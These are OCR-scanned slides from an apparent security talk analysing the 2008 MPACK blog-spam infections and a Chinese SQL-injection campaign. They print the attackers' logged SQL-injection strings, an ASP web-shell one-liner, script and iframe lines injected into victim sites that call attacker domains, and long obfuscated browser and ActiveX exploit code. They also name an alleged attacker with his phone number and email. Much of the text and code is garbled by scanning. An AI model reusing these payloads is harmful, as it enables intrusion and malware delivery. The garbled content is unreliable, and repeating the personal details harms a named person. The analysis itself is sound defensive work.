value=http: //prolnx. info/?id=1008&t=other&o=2> 

• </applet> 



[2W 
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Rirst Applet loads 

- Java2SE.jar 

- /com/ms/lang/RegKeyException.class 

Second Applet loads 

- dsbr.jar 

- /com/ms/security/securityClassLoader.class 

All Java Classes 

- Downloaded from prolnx.info 

- Intercepted and decompiled using jad 

- De-obfuscated by hand 

Both applets utilize several variables 

- Gathered from their applet param's 

- Possibly identify the target 
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Variables commonly used in web requests to 
http://prolnx.info/ 

- From Java2SE. class member of Java2SE.jar 

• Where s = getParameter ("usid") ; 

• s5 = getParameter ("uu") ; s6 = 
getParameter ( " tt" ) ; 

• usid=1008 uu=http: //prolnx. info/ tt=other 
•0Plog(s5 + "?id=" + s + "&t=" + s6 + "&o=4") ; 

• http: //prolnx. info/?id=1008&t=other&o=4 
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From Installer.class member of dsbrjar 

- Where 

s=applet . getParameter ( "ModulePath" ) ; 

- ModulePath=http : / /prolnx . inf o/ ? id=l 8 & 
t=other&o=2 

- URLDownloadToFile ( , s , s2 , , ) ; 

- http: //prolnx. inf o/?id=1008&t=other&o=2 
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Any webrequests of this format including the first 

download "GET /?id=1008&t=other&o=0 HTTP/1, l" 

receives a UPX packed binary 

- md5sum: adc6d03bc7ac04e2ddf9dea7ecee994f 

- Delivers a payload of type 1 and installs the agony 
root kit 

- However delivering the same payload each Applet 
executes the method uniquely 

- Presumably this is for persistence and a greater 
degree of overall success in infection. 
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All roads lead to MPACK 
We found a test directory 



£>Mozilla FirefoH 
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File Edit View Go Bookmarks Tools Help 






nj^ * 'n C^ *JU wivw.updateonSrie.cc/Hhupd^e/rTpacl^/aidminHphp ^j © Go l|GJ^ 





Login 



Unauthorised access prohibited. AJ1 activity is being monitored. 
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HPack v0.99 



ycTaHOBKa: 

1) CKoniipoBaTb coflep^HHoe Ha xoct 

2) ycTaHOBHTfa Ha nanny npaBa chmod(777) 

3) OTpeflaKTHpoBarrb HacTpoJiKH cbhbkh b $aHJie settings.php 

SAdminPath = "http : //host . coni/spk2 "; //nyrrb k nanKe c ycTaHOBJieHHOii ajjMHHKOH 

//jiophh h napojib flJiH flocTyna k CTaTHCTHPie 

3 Us er Name = "user " ; 

5 Pass wor d= "nipack2 " ; 

$BlockDuplicates=l; // 1 - 6 JioKHposaTb noBTopHtie 3axoflti 

SCountPef erers=l; //l - sec™ y^eT pe^epepos (oTKyjja npuxoflMT Tpa$<£) 

?HinPefs=5; //MHHHMajibHoe kojibo noHBJieHHJi pe^epepa mtoSbi oh OTo6pa3HJicH Ha CTpaHHne ctsthcthm 

E flaHHyro sepcHEi BKJOOMeHO Sojibiuoe KOJiiraecTBO yfl3BHHOCTeii Ha nepenojiHeHMe, nosTowy HacTonTejibHO peKO 

JIoaBep (hjih flpyroii 3arpy3;aeHHH (Jjaiiji) EOJEKeH HaxoflHTbcn b nanne c ycTaHOBJieHHoii cbh3koh c HHeHew f i 

3.1) Ecjih SyjieT Hcnojib30BaTbcn MySQL ejih noflc^eTa CTaTHCTHKH no CTpaHaw, HacTpoHTb h ero: 

SUseMySQL = 0; // 3aneHHTb Ha 1 ecjiH SyaeT Hcnojib30BaTbcn 

Sclbhost = "localhost"; //xoct Ha KOTopow pacnojioaieH wycKyjib 

Sclbuser = "spluseu"; 

Sdbpass = "splpass"; 

Sclbname = "spldb"; //hha 6a3ti jiaHHtix 

Sclbstats = "stats"; //huh TaSjinnbi b stoh 6a3e 

jj I 



S 



Done 
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MPACK 



MPACK uses some log files 

- ip_all.txt & ip_Oday.txt 

• Shouldn't be globally viewable, but were 

- Only one IP listed in log 

• Owned by attacker, used when setting up MPACK 
78.155.196.69 

n 1 96- 1 55-78-static-69 . rsspnet.ru . (looks like a possible Russian DSL line?) 

- domain: RSSPNET.RU 

- nserver: ns2.rts.spb.ru. 

- nserver: ns.rts.spb.ru. 

- person: Igor Sergeevich Diakonov 

- phone: +7 921 4212525 

• e-mail: igorsd@sysadmins.spb.ru 




Attack 

Process 

Flow 



Blog Spam 




E-mail register 

Comment post 

Domain owner Chinese 

Domain IP Czech 

Vi$itOr IP German 
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mybesix;ounic-,ric:l 



daoiasuKU. 



WEdalfifinUnfij^ 



bid-§55J5kar;g, 



I 



oatejalte 
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ciHPACK 
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BLOG SPAM CONCLUSIONS 




This attack was very complex 

Lots of evasion and obfuscation 

End goals unclear 

Changes often, updates rapidly to take 
advantage of new attacks 

Attacker(s) made mistakes 

DON'T CLICK WEIRD COMMENT LINKS! 




Chinese Injection 



Chinese Injection 

• Hackers are attacking thousands of websites 

• Initial goal is to compromise the 10's of 
thousands of visitors to these sites 

• Secondary goal appears to be info: 

• Game accounts 

• Passwords 

• Financial info 

• Attack infrastructure robust and quick to adapt 




Chinese Injection 



Analysis process 

- View victim website, locate injected code 

- Parse victim logs for initial attack 

- WGET code from attacker site 

• Follow any links 

• Decode obfuscated instructions 

• Debug javascript 

• Decompile Java Applets 

- Lookup owners of domains / IPs 

- Reverse any exploits / binaries 




Chinese Injection 



1 st stage: Find & hack website using SQLi 

- Upload backdoors 

2 nd stage: Inject small JS or FRAME 
3 rd stage: Clients visit hacked site 

- Begin complicated attack: 

• IFRAMES 

• Redirects 

• exploits 

4 th stage: Client is compromised 

- Steal game credentials, keylog, usual stuff 




Chinese Injection 



Attack begins with 58.218.204.214 

- Searches the web 

• Chinese version of Google 

- Looks for target sites 

• Ending in .com with ASP in the URL 

• The word "tennis" somewhere on the site 

Other IPs from China show up scanning with 
various SQLi techniques II 



HOST INFO - 


inetnum: 


58.208.0.0 - 58.223.255.255 


netname: 


CHINANET-JS 


descr: 


jiangsu province network 


descr: 


China Telecom 


descr: 


A12,Xin-Jie-Kou-Wai Street 


descr: 


Beijing 100088 


country: 


CN 



■ 




Chinese Injection 



Example Log Entry: 




-2008-12-13 02:10:41 

- 192. 168.1. [victim] HEAD /vuln.asp 80 

- 58.218.204.214 

- HTTP/1.0 Mozilla/4.0+ 
(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+.NET+CLR+2.0.50727) 

- http://www.qooqle.cn/search?num=100&hl=zh- 
CN&lr=lang_en&cr=countryUS&newwindow=1&as_qdr=all& 
q=inurl:asp+id+intext:tennis+site:.com&start=300&sa=N 

• Chinese language search settings 

• Targeting specifically US addresses only 

- www.thevictim.com 200 299 563 312 



Chinese Injection 



Once a target is found they attempt SQL 
injections 

Logs show HTTP 500 status codes 

- Consistent with an Internal Server Error 

- Most likely using db errors to gather info 

- Use both URL / Hex encoding as well as 
CHAR encoding & Upper / lower case 

• For detection evasion and obfuscation 



Chinese Injection 



• LOG EXAMPLE 



2008-12-13 03:22:34 

192.168.1.[victimip]GET/vuln.asp 

search=T&id= 

216%20%20AnD%20%28dB_NaMe%280%2 9%2BcHaR%2894%2 9 
%2BuSeR%2BcHaR%28 94%2 9%2B@@vErSiOn%2BcHaR%2894% 
2 9%2B@@sErVeRnAmE%2BcHaR%28 94%2 9%2B@@sErViCeNaM 
e%2BcHaR%28 94%2 9%2BsYsTeM_UsEr%2 9%3D0%20%20 

80-58.218.204.214 

Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5 

.0) 

www.victim.com 200 



Chinese Injection 



Need a decoder for the data 

- DECODER: 

• ruby -e '" [INSERT ENCODED DATA 
HERE] ".scan (/../) .each { |b| print 
b . to_i (16). chr } ; puts ' 

- ENCODER: 

• ruby -e ' " [INSERT DATA TO BE ENCODED 
HERE] ".each_byte {|b| puts b.to_s(16) 

Encoded data is actually SQLi: 



}' 



•216 AND (DB_NAME(0)+ A +USER+ A + @@VERSION 
+ A +@@SERVERNAME+ A +@@SERVICENAME+ A + 
SYSTEM USER)=0 



Chinese Injection 

Colin's quick decoder 

Handles both HEX, CHAR & nested encoding 

Fixes case 



# ! /usr/bin/ruby 

encoded = ARGV [ ] . to_s 

tmp = encoded. gsub (/%.. /) {|match| 
match [ 1 . . 2 ] . hex . chr } 

tmp = tmp. gsub (/[cC] [hH] [aA] [rR] \ (\d\d\) /) 
{ | match | match [ 5 . . 6 ] . to_i . chr } 

tmp = tmp. gsub (/Ox (\d | [abcdef ] )+/) {|match| 
match [2. .match. length] . gsub(/. ./) {|matchl| 
matchl . hex . chr } } 

puts tmp . upcase 



Chinese Injection 



Doubly encoded attack 



2008-12-13 03:22:35 192 . 168 . 1 . [victimip] GET /vuln.asp 

search=T&id=216%20AnD%20%28cAsT%28iS_srvrOlEmEmBeR%280x7300790073006 

10064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_srv 

rOlEmEmBeR%280x64006200630072006500610074006f007200%29aS%20vArChAr%2 

9%2BcHaR%2894%29%2BcAsT%28iS_srvrOlEmEmBeR%280x620075006c006b0061006 

4006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_srvrOlE 

mEmBeR%280x6400690073006b00610064006d0069006e00%29aS%20vArChAr%29%2B 

cHaR%2894%29%2BcAsT%28iS_srvrOlEmEmBeR%280x7300650072007600650072006 

10064006d0069006e00%29aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEm 

BeR%20%280x7000750062006c0069006300%29%20aS%20vArChAr%29%2BcHaR%2894 

%29%2BcAsT%28iS_mEmBeR%20%280x640062005f006f0077006e0065007200%29%20 

aS%20vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEmBeR%20%280x640062005f0 

06200610063006b00750070006f00700065007200610074006f007200%29%20aS%20 

vArChAr%29%2BcHaR%2894%29%2BcAsT%28iS_mEmBeR%20%280x640062005f 006400 

610074006100770072006900740065007200%29%20aS%20vArChAr%29%29%3D0%20| 

38 | 80040e07 | Syntax_error_converting_the_varchar_value_' A A A A A 1 A 1 

A A 0'_to_a_column_of_data_type_int. 80 - 58.218.204.214 HTTP/ 1.1 

Mozilla/4 . 0+ (compatible ;+MSIE+ 6 . ; +Windows+NT+5 . 0) 

ASPSESSIONIDASCRQQRC=JEJNPOEBDIJNIJPGIFJNAGJM - www.victim.com 500 

586 1174 343 
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Decoded version 



-216 AND (CAST (IS_SRVROLEMEMBER(SYSADMIN)AS VARCHAR) 



- + 



CAST(IS_SRVROLEMEMBER(DBCREATOR) AS VARCHAR) + A + 
CAST(IS_SRVROLEMEMBER(BULKADMIN)AS VARCHAR) + A + 
CAST(IS_SRVROLEMEMBER(DISKADMIN)AS VARCHAR) + A + 
CAST(IS_SRVROLEMEMBER(SERVERADMIN)AS VARCHAR) + A + 
CAST(IS_MEMBER (PUBLIC) AS VARCHAR) + A + 
CAST(IS_MEMBER (DB_OWNER) AS VARCHAR) + A + 
CAST(IS_MEMBER (DB_BACKUPOPERATOR) AS VARCHAR) + A + 
CAST(IS_MEMBER (DB_DATAWRITER) AS VARCHAR))=0 
|38|80040E07| 



Chinese Injection 

Numerous Chinese tools and how-to sites exist for 
generating these types of attacks 



Example: 

• NBSI 3.0 SQLi generation tool 

• HVIEbysoftbug 



EHfr ASCffUBaffKTiEafllllHltr »rtb. E sku-t-b 





rftt IK JkT 




9H9 



iir^ir (TD'lTCbiirirti i&OITEL^Bkaj fc$llZbii*iiMi iti")Kbj*hm iKJE^-J 



fc«£«flfe\* 



ift#9ftlb!llft& 



! 



J 



a&Jtos?*^. 



v 



icrosof-t OLE DE Provider for SQL Sarvar SlK ? S004QeOT ? 
Ift varchar 1I '9a' ftftftft«|&£ft in* fi^**fi:*SiiB«* 



I*™™*"" 



<£) ® © . © €> © 
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Scan Iixjcct :| Ba.fr | Database j -fcrfeashell | GLs:c&= QdA^- | Comaa-icx | I-ccLLst 
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Chinese How-to sites with similar attack code 



^Jnjxj 



File Edit View History Bookmarks Tools Help 



n 



http : //it . icxo . com/htmlnews/2004/ 1 2/03/493748 . htm 



ft - | EH Google 



©NB5I aA#tfIUSffift(MSSQL j|)(H) . 



0NBSI2rtffi3££9:Mrc 



£3 



GET/article_read.asp?id=80;declare%20@a%20int-- HTTP/1.1 
IP : article_read.asp?id=80;declare @a int-- 

GET /article_read. asp?id=80 %20and %20(Select %20count(1 ) %20from %20[sysobjects])>=0 HTTP/1 . 1 

Accept: image/gifjmage/x-xbitmapjmage/jpeg,image/pjpeg,7* 

User-Agent: Microsoft URL Control - 6.00.8862 

Host: 

Connection: Keep-Alive 

Cache-Control: no-cache 

Cookie: articleid=80%3Bdeclare %40a int%2D%2D; ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED 

IP : article_read.asp?id=80 and (Select count(1) from [sysobjects])>=0 

GET/article_read.asp?id=80%20And%20user%2Bchar(124)=0 HTTP/1.1 

Accept: image/gifjmage/x-xbitmap jmage/jpeg,image/pjpeg,7* 

User-Agent: Microsoft URL Control - 6.00.8862 

Host: 

Connection: Keep-Alive 

Cache-Control: no-cache 

Cookie: articleid=80 and %28Select count %281 %29 from %5Bsysobjects%5D%29%3E%3D0; 

ASPSESSIONIDSSTCTTQD=ELLNNEIDCEEANBMOKAMGJGED 

IP : article_read.asp?id=80 And user char(124)=0 

userJlSQLServerKJ-^hrtiS^M , '£tt1IJi^M£gttJS^£ , ^M^nvarchar *-^nvarcharto1IiRintKJJ8[0.tt& , ^&£*KM 

nvarchar^H^^intM , &tt£rjg*1f££tij*t , ^£& , &tt£rjg*1f££tij*t , SQLSeiverEltii*t®fiJt : ^nvarcharfl &#B221;east_asp&#B221; & 

temmgrn*) int mm$L±®%k%-&, «« , east_aspIEji£musertt1I , && , ^J£&0t£i8K«l7»«KlJlJ*£o and user>0 

GET/article_read.asp?id=80%20And%20Cast(IS_SRVROLEMEMBER[Dx730079007300610064006D0069006E00)%20as%20varchar(1))%2Bchar(124) 

=1 HTTP/1.1 

Accept: image/gifjmage/x-xbitmap jmage/jpegjmage/pjpeg, 7* 

User-Agent: Microsoft URL Control - 6.00.8862 






j 
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Chinese Injection 

Chinese How-to sites with similar attack code 



File Edit 'iiw.' History Bool mails Tools Help 










t9| ' C lJLi | © http://www.anqn.eom/article/a/2005-12-28/a0976607.shtml 




ft - |0H Go °9 le 


>-■' 




2 ) #pj?&Kii 


And (Select Top 1 isNull(cast([sName] as archar(8000) c:har(32)) 2Bchar(1 24) From (Select Top 9 sName From [Nev 


s_Style] Where 


1=1 Order by sName)T Order by sNan 


ne desc)>0 



**£S-T : char(124)jM^H fiKS^TiftTffi^fe^^^b?3^#^^MM^»!nt^Mffimtg , fcjg*aj»Ji BSJflffl^ ! SSE&NBStfg fl-££#3lfl9 



00 

Y_Column_ Maine 



diyjestl 
ithomel 
mobile testl 
nb_testl 
pcjestl | 
sale] 



WSj7H3?/gM*fl#TW° 

And (Select Top 1 isNull(cast([UserName] as varchariSOOOi) char(3:»° :Bcha 2A ■■. : .2Bi:Null(cact([PassWord] a: varchar(8000)i char(32)) From (Select Top 1 UserNarne.PassWord From [N 
Microsoft OLE DB Provider for SQL Server ^l§ ' 80040e07' 
$ varchar 11 ' bandit 1 310810' ^m%^.^^m% int fiWItfSSiE *KiiIo 

News_user*-tS=S , Char(124)aM^^»S7, A* RlJJll&SMifc , ffi±ffiK^Jfll2 JMMBig^ffi^Jfc-T, JI#S**fe^JAig»Sjg«ili#iii*## 
Jj> , T&SNBSIfi$ltffciB£ffiBrfcffifiHB£±iiB ! 

^gfiliwieiss^, ife^waftR^^^#i|§/*fttP#sB*rs7, Amwsampj, NBsi&^fijif^&a^£A&nii?KS#£sQLaigR&-^s 

5&^7 NBSI!£SW1PISKMWSS&& : 

2 WWlISKltR^ ^1^^0200,101 hMM , SnS3fi@500JiliJa*ma!7#®, 

■T-m: g#*artt!Mfl.uE^(IB) 
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In this particular case, the SQLi fails 

Google shows several thousand websites 
redirecting to the various URLs 

- Many probably via SQLi 

• 17gamo.com 

• yrwap.cn 

• sdo.1000mg.cn 

• www3.800mg.cn 

• jjmaoduo.3322.org 

• douhunqn.cn 




Chinese Injection 



58.218.204.214 discovers a library component of the victim 

- Allows image uploading 

Attacker uploads a file called 01 .cdx to the images directory 
What is a CDX file? 

- A type of image object file 

Image library only allows certain file types ■ l ■ 

- CDX files allowed 

In this case 01 .cdx is a GIF 

- Contains embedded code, similar to a GIFAR 

- < script language = VBScript runat = server >execute 
request ("go") < / Script > 

;<%execute (request ("lionl21") ) %> <%executeglobal 
request ("lionl21")%> <%eval request ("lionl21") %> 




Chinese Injection 




By default IIS interprets CDX files as ASP 
scripts 

The victim image library allows CDX file 
uploads 

- Some image libraries verify file type is an image 
before allowing upload 

- To bypass these checks, the attackers used a 
real GIF file with embedded VBScript 

- The image library will detect a real GIF file and 
allow upload to take place, 

- The IIS server will interpret the VBScript code like 
any other ASP script 



Chinese Injection 

They make HTTP POST'S to the CDX 

This makes analysis more difficult due to a lack of information in the 
web logs when using a POST. 

They make one GET: 

- 2008-12-13 04:25:15 192 . 168 . 1 . [victimip] GET 

/ Images /Ol.cdx | 18 | 800a000d|Type_mismatch:_' execute' 
80 - 58.218.204.214 

Mozilla/4 . 0+ (compatible ;+MSIE+ 6 . ; +Windows+NT+5 . 1 ;+SV 
1) http : //www . victim . com/vuln_image_library . asp 
www.victim.com 500 



Then follows a series of about five posts to the .CDX file 

Then they create log.asp and top. asp 

Log. asp is a fairly well known ASP backdoor in the Chinese 
language 

Usemame for backdoor is "lion121" 

Password is some Chinese character set string 



Chinese Injection 



We can determine a few things from the 
way they use this backdoor 

First they use GET's instead of POSTs 

Lets us see what params are passed to 
the app 

- GET /Images/log.asp Action=Show1File GET 
/Images/log. asp Action=MainMenu GET 
/Images/log.asp Action=UpFile GET 
/Images/log.asp Action=Cmd1 Shell GET 
/top. asp Action=plgm 



Chinese Injection 





pBfcW 



Then they switch to POSTs 

- Eliminates our ability to see 

• POST /Images/log.asp Action2=Post 

• POST /Images/log.asp 

Eventually, after many posts, they embed 
their code on every page of the victim's 
site: 

- <script src=http : //yrwap . cn/h . jsX/ scrip t> 



Chinese Injection 



• Source of the JS: 

- document.write("<iframe width-100' height- 0' 
src='http://www.17gamoxom/coo/index.htnri , </iframe> ,, ); A l\/l 

- document.write("<iframe width='0' height='0' 
src='http://www.trinaturk.com/faq.htm , </iframe> ,, ); A M 

• We've seen 17gamo before in failed SQLi attempts 

• Probably indicates all attacks / IP's related 

• Note the A M, probably created on windows 

• Begins typical IFRAME redirects in many 
directions 



Chinese Injection 



< script language^" javascript" src= 

"http: //countl7 . 51yes . com/click. aspx?id=171044941&logo=l"></script> 

<html><script> 

document. write ("<iframe width=100 height=0 src=14 .htm</iframe> ff ) ; 

document. write ("<iframe width=100 height=0 src=flash.htm</iframe> ff ) ; 

if (navigator . user Agent . toLowerCase ( ) . indexOf ("msie7" ) >0) 
document. write ("<iframe src=IE7.htm width=100 height=0>"); 
try { var d; 
var lz=new ActiveXObject ( "NCTAudio" + "File2 . AudioFile2 . 2" ) ; } 

catch (d) { } ; 

finally! if (d! =" [object Error] " ) {document . write ("");} } 

try { var b; 

var of=new ActiveXObject ("snpvw. Snap" + "shot Viewer Control . 1") ; } 

catch (b) { }; 

finally! if (b ! =" [object Error] " ) {document .write (" 



<iframe width=100 height=0 src=of fice .htm") 

function Game ( ) { 

Sameee = "IERPCtl . IERPCtl . 1" ; 

try { Gime = new ActiveXObject (Sameee) ; } 

catch (error) { return; } 

Tellm = Gime.PlayerProperty ( "PRODUCT " + " VERSION" ; 

if (Tellm<="6 . 0.14. 552") 

document . write ( " " ) ; 

else document .write ("") ; } 

Game ( ) ; 



}} 
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Deploys multiple exploits 



- IE 7 MS08-078 (recent Oday) 

- Flash exploit for 6.0.14.552 

- Microsoft Access Snapshot Viewer ActiveX Control Exploit 

- RealPlayer rmoc3260.dll ActiveX Control Heap Corruption 

- IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow 

- A ton of other SWF exploits depending on version (I counted at 
least 12) ^1 A< +~^M 




Chinese Injection 

IE 7 MS08-078 

<html> 

<div id="le70day">x</div> 

<script> 

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?":e(parselnt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toStr 
ing(36))};if(!".replace(/ A /,String)){while(c-){d[e(c)]=k[c]||e(c)}k=[function(e){return 

d[e]}];e=function(){return^\w+'};c=1};while(c--){if(k[c]){p=pTeplace(newRegExp(^\b , +e(c)+ , \\b , , , g , ),k[c])}}return p}('a 
z=9("% 1 h%f% 1 g% 1 f%1 i% 1 j%r% 11% 1 k% 1 e% 1 d% 1 7%r% 1 6%l% 1 5% 1 8% 1 9% 1 c% 1 b% 1 a% 1 m% 1 n% 1 z% 1 y% 1 x 
%1A%1B%1D%1C%1w%1v%l%1q%14%1o%1r%1s%1u%1t%1E%U%K%M%N%H%F%A%B%m%D%E%0%m 
%Z%g%b%q%Y%1 1 %g%b%q%y%1 3%6%R%W%P%L%T%S%s%Q%V%6%1 2%1 0%G%J%1 p%1 Q%2n%c%7 
%2m%2o%2p%s%6%7%2q%2l%2k%y%1F%2f%2e%7%2d%2g%2h%2t%c%2i%2s%1%2B%2E%2D%2G%2F% 
4%2I%1 %2H%2C%2w%2v%2u%2x%2y%2A%2z%4%2j%1 %k%j%4%2b% 1 %k%j%4%2c%1 %1 R%1 S%1 U%o% 
1T%1 0%1 N%1 1%1 H%1 G%1 J%1 K%n%o%n%1 M%1 L%f );a 2=9("%8%8");1 V{2+=2}1 W(2.26<25);d=27 
28();2a(i=0;i<29;i++)d[i]=2+z;e="<3 x=l><X><C><![23[<1Y 1X=1Z://&#w;&#w;.20.22>]]></C></X></3><5 t=#l u=C 
v=p><3 x=l></3><5 t=#l u=C 

v=p></5></5>";h=21.24("1P");h.2r=e;',62,169;|uffff|spray|XML|ue800|SPAN|uff52|u53d0|u0a0a|unescape|var|u0e 
4e|uff00|memory|xmlcode|u0000|u8e68|tag||u765c|u2e2e|ueb01|u5b8b|u6e69 
TASRC|DATAFLD|DATAFORMATAS|x0a0a|ID|uebd6|shellcode|u6459|u198b 
U6a59|u5e5f|uaa68|u5b5d|u08c2|u1b8b|u5352|u4deb|u89d0|uff7c " "" " "" 
Iu53c7|uebd0|u5a50u4b0c|u32e3|u205a|u4a8b|u8b49|u8b34|u31f 



uO 



u0dfc|uc03 



8|u8b57|u246c|u548b|u3c45|uacc0|ue038|u5a8bu6a00|u8b66 

Cl|u0774|uebc7|u3bf2|u7514|u247c|u02eb|u5944|u6d6f|u632e 

day|u5100|u7468|u7074|u7777|u2f3a|do|while|SRC|image|http 

d0000|length|new|Array|100|for|uffb7|uff89|u7e68|uff51|u006a|ue2d8|uff73|ue8d0|uffa0|uff0e|u8afe|ua068|u6a52| 

uc9d5|uff4d|u9868|innerHTML|uffab|u6ad6|u616f|u6c6e|u776f|u5464|u466f|u4165|u6c69|u7275|u444c|u6e6f|u6d 

6c|u6c6c|u642e|u5255|uffae'.split( , | , ),0,{})) 



u772f|HTML|uffec|u8b1 8|u5ad6|DA 

Iu8b0c|u1c5b|u306a|u5beb|u5e00|| 

|u51 59|u52c2||u89d6|u5308|u5a72 

c|uff31 |uee01 |uea01 |u7805|u5655|u5300|u56e 

1 c|u8beb|ue801 |u8b04|u245a|u8be1 |u01 Od|ucf 

U6f6f|u612f|u6d64|u6578|u652e|u6574|u732e|le70 

xiaolen|document|com|CDATA|getElementByld|Ox 



</script> 
</html> 



Chinese Injection 



Microsoft Access Snapshot Viewer ActiveX Control Exploit 

<object classid='clsid:F0E42D50-368C-1 1 D0-AD81-00A0C90DC8D9' 
id='obj'x/object> 

<script language- javascript'> 

eval(function(p,a,c,k,e,d){e=function(c) {return 
c.toString(36)};if(!".replace(/ A /,String)){while(c- 
-){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return 
d[e]}];e=function(){return'\\w+ , };c=1};while(c- 
-){if(k[c]){p=p.replace(newRegExp( , \\b , +e(c)+ , \\b , , , g , ),k[c])}}retum 
p}( , a="b";2 3=V9://d.e.7/5/6.1 V;2 4=V8:/c q m/f o/p 



l/k/g/h.1V;0.i=3;0.j=4;0.n(); , ,27,27,'obj|exe|var|buf1|buf2admin|win|co 
m|C|http|test|lengoo|Documents|www|steoo|AII|StartupThunder|Sna 
pshotPath|CompressedPath|Programs|Menu|Settings|PrintSnapshot 
Users|Start|and'.split(T),0,{})) 



</script> 



Chinese Injection 



NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow 



<html> 

<script language="JavaScript" defer> 

window.onerror=function(){return true;} 

eval(function(p,a,c,k,e,d){e=function(c){return c};if(!".replace(/ A /,String)){while(c-){d[c]=k[c]||c}k=[function(e){return 

d[e]}];e=function(){return^\w+ , };c=1};while(c--){if(k[c]){p=p.replace(newRegExp( , \\b , +e(c)+ , \\b , , , g , ),k[c])}}returnp}( , 78="77 ,, ;1 
12=15( ,, %76%22%79%80%82 o /o81%17 o /o75%74 o /o69%68 o /o67%17 o /o70 o /o29%71%73%72%83%84 o /o95%94 o /o96%97 o /o99%98 o /o66 o /o92% 
87%86%85%88%29%89%91 %90%1 00%52%45%44%46%47%43%48%49%41 %42%65%60%28%59%61 %64%28%50%37%38%31 % 
58%57%37%38%31 %25%54% 1 6%56%55%53%5 1 %63%62%20%93% 1 33% 1 6% 1 44% 1 43% 1 45% 1 46% 1 48% 1 47% 1 42% 1 9% 1 3% 1 4 1 
% 1 36% 1 35%20% 1 6% 1 3% 1 37% 1 38% 1 40%25% 1 1 % 1 39% 1 50% 1 3% 1 57% 1 6 1 % 1 60% 1 59% 1 9% 1 63% 1 65%6% 1 64% 1 62% 1 58% 1 52% 
1 51 %9% 1 53%6% 1 54% 1 56% 1 55% 1 49% 1 34% 1 1 2% 1 1 1 %1 1 3%1 14%9%1 1 6%6%23%30%9%1 1 5%6%23%30%9%1 1 0%6%1 09% 1 04% 
1 03%26%1 02% 1 05% 1 06% 1 08% 1 07%1 1 7%1 1 8%1 28%27%26%27%127%1 29%22");1 3=1 5("%1 8%1 8");1 39=1 30;40 1 32(){1 1 1 =1 31 ;1 
4=15("%7%7%7%7");36(4.14<11)4+=4;4=4.35(0,11);126.125(4)}40 21(3,5){36(3.14*2<5){3+=3}3=3.35(0,5/2);120(3)}1 10=1 If ' 
33=121;1 24=(12.14*2);1 5=10-(24+33);1 34=(39+10)/10;1 32=122 



19;1 



buffSize|sCode|u53dO|length|u 



124();3=21(3,5);123(8=0;8<34;8++){32[8]=3+12} , ,10,166, , |var||sSlide|x|sSlideSize|uffff|0c|i|ue800|heapBS 
nescape|uff52|u8b18|u9090|uff00|u5ad6|getsSlideu0000|u2e2e|PLSize|uebd6|u772f|u6e69|u5b8b|ueb01 u765c 
heapBlocks|substring|while|u8e68|u0e4e|heapSA|function|u5e00|u306a|u5e5f|ue801|u8b04|u02eb|uc031 u5b5d 
beb|u5352|u5a50|u52c2|u89d0|u53c7|u89d6|u8b0c|u198b|u1c5b|uff7c|u0dfc|u1b8b|u6459|uebc7|u4a8b|uea01|u7805|u205a|u32e3|u8b 
34|u8b49|u548b|u3c45|u56e8|game|test|u5300|u5655|u246c|u8b57|uee01|uff31|u8be1|u7514|u247c|u245a|u8b66|u5a8b|u4b0c|u3bf2|u 
4deb|uacc0|u31fc|ue038|u0774|u010d|ucfc1|u011c|u5944|u7777|u2f3a|u7074|u732e|u6574|u632e|u6f6f|u7468|uff89|u466f|u5464|u6c69 



uffec|memory|sizeHDM| 
U08c2|u5308|uaa68|u8 



u4165|uffb7|uffa0|u6d6f|u612f|0x400000|return|0x5|new|for|Array|SetFormatLikeSample 
Me|u5159|u616f|uff4d|uc9d5|u9868|u8afe|u006a|uff0e|ua068|u6a52|u5a72|uebd0|u5beb 
ffae|u5255|u776f|u444c|u7e68|u6e6f|u6ad6|uff73|ue2d8|u6d6c|ue8d0|u7275|uffab'.split(' 



</script> 

<body onload="JavaScript: return tryMe();"> 

<object classid="clsid:77829F14-D91 1-40FF-A2F0-D1 1 DB8D6D0BC" id='boom , x/object> 
</body> 
</html> 



boom|u652e|u6d64|u6578|0x0c0c0c0c|5200|try 
u6a59|u51 00|u6a00|u6c6e|uff51 Iu6c6c|u642e|u 

■).o,{})) 



Chinese Injection 



RealPlayer rmoc3260.dll ActiveX Control Heap Corruption 



<script language="JavaScript"> 
eval(function(p,a,cXe,d){e=function(c){return(c<a?^ 



RegExp( , \\b'+e(c)+ , \\b','g'),k[c])}}return p}('1 k="1 n";o 
j=["%17 ,, + ,, %19"+"%1j ,, +"%K ,, ,"%1J"+"%1E"+ ,, %m","%1 



,String)){while(c-){d[e(c)]=k[c]j|e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c-){if(k[c]){p=p.replace(new 



jH''%17'>'Vo19"+ , To1J"+'VoK7To1J"+ , To1b"+'VomV 

J"+"%W ,, + , Vo1z ,, + ,, %m^ ,, %J ,, + ,, %W ,, + ,, %1A ,, + ,, %m ,, , ,,0 /o1w ,, +"%11"+"%1v ,, + ,,0 /oB ,, ];1pO(){o 

u=z. 1 r["\\A\\H\\1 s\\H\\1 u\\t\\1 1\\1 CW1 DW1 N\\t"]();d(u.k("N 6")==-1 &&u.k("N 7")==-1 )p;d(u.k("1 5.")==-1 )p;o 

Z;x="1P"+"1Q.|"+"1L"+"1K.1";Z=x;1o{w=1F 




1 ){q(i=0;i<4;i++)b=b+r;b=b+f}e d(h.k("6.0.1 1 



')f=l(j[5]);ed(h 
.")!=-1){q(i=0; 




i<6;i++)b=b+r;b=b+f}ed(h.k("6.0.12.")!=-1){q(i=0;i<9;i++)b=b+r;b=b+f}e 



(j[7]); 

O=0;i 



=8+"21";8=8+ ,, 23";8=8+ ,, 24 ,, ;8=8+ ,, 26";8=8+"25 ,, ;8=8+"20 ,, ;8=8+"1Z ,, ;8=8+"1U 
